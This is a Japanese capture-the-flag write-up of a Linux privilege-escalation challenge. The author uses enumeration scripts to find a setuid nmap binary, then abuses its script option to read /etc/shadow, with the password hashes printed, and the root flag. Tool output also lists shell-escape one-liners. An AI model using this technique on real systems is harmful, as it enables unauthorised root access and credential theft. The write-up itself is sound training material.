Question

ssh user@35.231.176.102 -p1774 
Password: utsacyber

f:id:graneed:20190427233557p:plain

Solution

user@7ab7e9c7f6a4:~$ ll
total 32
drwxr-xr-x 1 user user 4096 Apr 27 14:35 ./
drwxr-xr-x 1 root root 4096 Apr 22 20:12 ../
-rw-r--r-- 1 user user  220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user user 3771 Aug 31  2015 .bashrc
drwx------ 2 user user 4096 Apr 27 14:35 .cache/
-rw-r--r-- 1 user user  655 May 16  2017 .profile
-rw-rw-r-- 1 root root   10 Apr 22 20:56 readme.txt
user@7ab7e9c7f6a4:~$ cat readme.txt 
Get root.

Privilege Escalationする問題のようだ。

linuxprivcheckerとLinEnumを使用して、攻略の糸口を調査する。

linuxprivchecker

user@7ab7e9c7f6a4:~$ cd /tmp/
user@7ab7e9c7f6a4:/tmp$ wget https://www.securitysift.com/download/linuxprivchecker.py
--2019-04-27 14:39:10--  https://www.securitysift.com/download/linuxprivchecker.py
Resolving www.securitysift.com (www.securitysift.com)... 173.254.14.183
Connecting to www.securitysift.com (www.securitysift.com)|173.254.14.183|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K) [application/octet-stream]
Saving to: 'linuxprivchecker.py'

linuxprivchecker.py       100%[=====================================>]  24.71K  --.-KB/s    in 0s      

2019-04-27 14:39:10 (54.0 MB/s) - 'linuxprivchecker.py' saved [25304/25304]

user@7ab7e9c7f6a4:/tmp$ python linuxprivchecker.py 
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 4.15.0-1029-gcp (buildd@lcy01-amd64-029) (gcc version 7.3.0 (Ubuntu 7.3.0-16ubuntu3)) #31-Ubuntu SMP Thu Mar 21 09:40:28 UTC 2019

[+] Hostname
    7ab7e9c7f6a4

[+] Operating System
    Ubuntu 16.04.6 LTS \n \l

(snip)

[+] SUID/SGID Files and Directories
    -rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /sbin/pam_extrausers_chkpwd
    -rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
    -rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
    -rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
    -rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
    -rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
    drwxrwsr-x 7 root staff 4096 Apr 22 20:12 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/sgml/entities
    drwxrwsr-x 6 root staff 4096 Apr 22 20:12 /usr/local/share/xml
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/declaration
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/misc
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/schema
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/share/xml/entities
    drwxrwsr-x 3 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python3.5/dist-packages
    drwxrwsr-x 4 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/dist-packages
    drwxrwsr-x 2 root staff 4096 Apr 22 20:12 /usr/local/lib/python2.7/site-packages
    -rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
    -rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
    -rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
    -rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
    -rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
    -rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
    -rwxr-sr-x 1 root tty 27368 May 16  2018 /usr/bin/wall
    -rwxr-sr-x 1 root shadow 22768 May 16  2017 /usr/bin/expiry
    -rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap
    -rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
    -rwxr-sr-x 1 root ssh 358624 Mar  4 14:09 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 428240 Mar  4 14:09 /usr/lib/openssh/ssh-keysign
    drwxrwsr-x 2 root staff 4096 Apr 12  2016 /var/local
    drwxrwsr-x 2 root mail 4096 Feb 22 10:05 /var/mail

(snip)

[+] Installed Tools
    /usr/bin/awk
    /usr/bin/perl
    /usr/bin/python
    /usr/bin/vi
    /usr/bin/vim
    /usr/bin/nmap
    /usr/bin/find
    /bin/netcat
    /bin/nc
    /usr/bin/wget

[+] Related Shell Escape Sequences...

    nmap-->  --interactive
    vi-->    :!bash
    vi-->    :set shell=/bin/bash:shell
    vi-->    :!bash
    vi-->    :set shell=/bin/bash:shell
    awk-->   awk 'BEGIN {system("/bin/bash")}'
    find-->  find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
    perl-->  perl -e 'exec "/bin/bash";'

[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...

    Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!

    The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system

    The following exploits are applicable to this kernel version and should be investigated as well
    - Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
    - Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
    - CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
    - open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c

Finished
=================================================================================================

LinEnum

user@7ab7e9c7f6a4:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2019-04-27 14:40:28--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45639 (45K) [text/plain]
Saving to: 'LinEnum.sh'

LinEnum.sh                                    100%[==============================================================================================>]  44.57K  --.-KB/s    in 0.02s   

2019-04-27 14:40:28 (1.84 MB/s) - 'LinEnum.sh' saved [45639/45639]

user@7ab7e9c7f6a4:/tmp$ chmod 777 ./LinEnum.sh 
user@7ab7e9c7f6a4:/tmp$ ./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.96

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sat Apr 27 14:41:02 UTC 2019

(snip)

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/curl


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 1328 Apr 22 20:12 /etc/passwd
-rw-r--r-- 1 root root 602 Apr 22 20:12 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 898 Apr 22 20:12 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 428240 Mar  4 14:09 /usr/lib/openssh/ssh-keysign


[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 2770528 Mar 31  2016 /usr/bin/nmap

(snip)

### SCAN COMPLETE ####################################

nmapがインストールされており、SUIDビットが立っていることがわかる。しばらくWebを調査すると、以下の記事を発見する。

gtfobins.github.io

nmapの--scriptオプションが使用できそうだ。

上記の記事を試してみるが、そのままではShellの取得はできなかった。何かもう一工夫が必要なのだろうか。
ただ、File readの手順(を少し修正して)で、/etc/shadowファイルの読み込みはできた。

user@7ab7e9c7f6a4:/tmp$ TF=$(mktemp)
user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/etc/shadow", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:43 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
root:$6$i09NKN3z$3ubpJ2G77IKDzS5KKfYjGx3p4MM7ISlhKmDD/.4oJ8Yf88CkRnJVoqdS4BMh8Vae/fQg3.Rjvcbxb4IHgmAqn0:18008:0:99999:7:::
daemon:*:17949:0:99999:7:::
bin:*:17949:0:99999:7:::
sys:*:17949:0:99999:7:::
sync:*:17949:0:99999:7:::
games:*:17949:0:99999:7:::
man:*:17949:0:99999:7:::
lp:*:17949:0:99999:7:::
mail:*:17949:0:99999:7:::
news:*:17949:0:99999:7:::
uucp:*:17949:0:99999:7:::
proxy:*:17949:0:99999:7:::
www-data:*:17949:0:99999:7:::
backup:*:17949:0:99999:7:::
list:*:17949:0:99999:7:::
irc:*:17949:0:99999:7:::
gnats:*:17949:0:99999:7:::
nobody:*:17949:0:99999:7:::
systemd-timesync:*:17949:0:99999:7:::
systemd-network:*:17949:0:99999:7:::
systemd-resolve:*:17949:0:99999:7:::
systemd-bus-proxy:*:17949:0:99999:7:::
_apt:*:17949:0:99999:7:::
sshd:*:18008:0:99999:7:::
user:$6$xReGWCgk$2OD/Q2jXewLgbryfcZZugNCic/xBt.BKkbk5dB6BcRQmNdw.yw6PC1S8N40Tm7WymaTh4K927hFGUJ9aoSm/1.:18008:0:99999:7:::

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
    [C]: in function 'error'
    /usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
    /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
    /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
    [C]: in ?

QUITTING!

1つ前の問題のフラグがflag.txtファイルにあったこと、README.txtにGet root.と書かれていたことから、
/root/flag.txtがフラグファイルの場所と推測する。

user@7ab7e9c7f6a4:/tmp$ echo 'f=io.open("/root/flag.txt", "rb"); print(f:read("*a")); io.close(f);' > $TF
user@7ab7e9c7f6a4:/tmp$ nmap --script=$TF

Starting Nmap 7.01 ( https://nmap.org ) at 2019-04-27 14:44 UTC
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: Warning: Loading '/tmp/tmp.Sr3NS1BmQI' -- the recommended file extension is '.nse'.
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:607: /tmp/tmp.Sr3NS1BmQI is missing required field: 'action'
stack traceback:
    [C]: in function 'error'
    /usr/bin/../share/nmap/nse_main.lua:607: in function 'new'
    /usr/bin/../share/nmap/nse_main.lua:805: in function 'get_chosen_scripts'
    /usr/bin/../share/nmap/nse_main.lua:1249: in main chunk
    [C]: in ?

QUITTING!

フラグゲット。
CSACTF{sh3_d0esnt_3v3n_g0_h3r3}